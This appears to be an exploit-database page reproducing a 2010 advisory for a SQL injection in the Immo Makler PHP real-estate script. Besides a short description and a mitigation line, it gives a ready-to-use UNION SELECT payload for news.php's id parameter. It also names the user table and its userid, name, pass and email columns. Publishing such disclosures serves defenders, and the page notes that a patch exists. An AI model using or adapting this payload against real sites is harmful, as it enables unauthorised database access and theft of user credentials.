header-logo
Suggest Exploit
vendor:
Immo Makler
by:
Easy Laster
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Immo Makler
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

Immo Makler <= SQL injection Vulnerability Proof of Concept

A SQL injection vulnerability was discovered in Immo Makler, a PHP script by Easy Laster. The vulnerability allows an attacker to execute arbitrary SQL commands on the vulnerable system. The vulnerable parameter is the 'id' parameter in the 'news.php' script, which can be manipulated to inject malicious SQL code. The malicious code can be used to extract data from the 'user' table, such as the version of the database, userid, name, pass, and email.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.
Source

Exploit-DB raw data:

----------------------------Information------------------------------------------------
+Name : Immo Makler <=  SQL injection Vulnerability Proof of Concept
+Autor : Easy Laster
+Date   : 17.12.2010
+Script  : Immo Makler
+Vendor " http://www.mhproducts.de/
+Price : 199,00 €
+Language : PHP
+Discovered by Easy Laster
+Security Group 4004-Security-Project.com
+Greetz to Team-Internet ,Underground Agents and free-hack.com
+And all Friends of Cyberlive : R!p,Eddy14,Silent Vapor,Nolok,
Kiba,-tmh-,Dr.ChAoS,HANN!BAL,Kabel,-=Player=-,Lidloses_Auge,
N00bor,Ic3Drag0n,novaca!ne,n3w7u,Maverick010101,s0red,c1ox,enco.
 
---------------------------------------------------------------------------------------
                                                                                      
 ___ ___ ___ ___                         _ _           _____           _         _  
| | |   |   | | |___ ___ ___ ___ _ _ ___|_| |_ _ _ ___|  _  |___ ___  |_|___ ___| |_
|_  | | | | |_  |___|_ -| -_|  _| | |  _| |  _| | |___|   __|  _| . | | | -_|  _|  _|
  |_|___|___| |_|   |___|___|___|___|_| |_|_| |_  |   |__|  |_| |___|_| |___|___|_| 
                                              |___|                 |___|           
 
 
----------------------------------------------------------------------------------------
+Proof of Concept
+Table Name => user
+Column names => userid,name,pass,email
+SQL Injection Vulnerability => news.php?id=-1+union+select+1,2,3,4,5,concat(version
()),7,8,9+from+user--
----------------------------------------------------------------------------------------

Navigation

Suggest Exploit

Services By CQR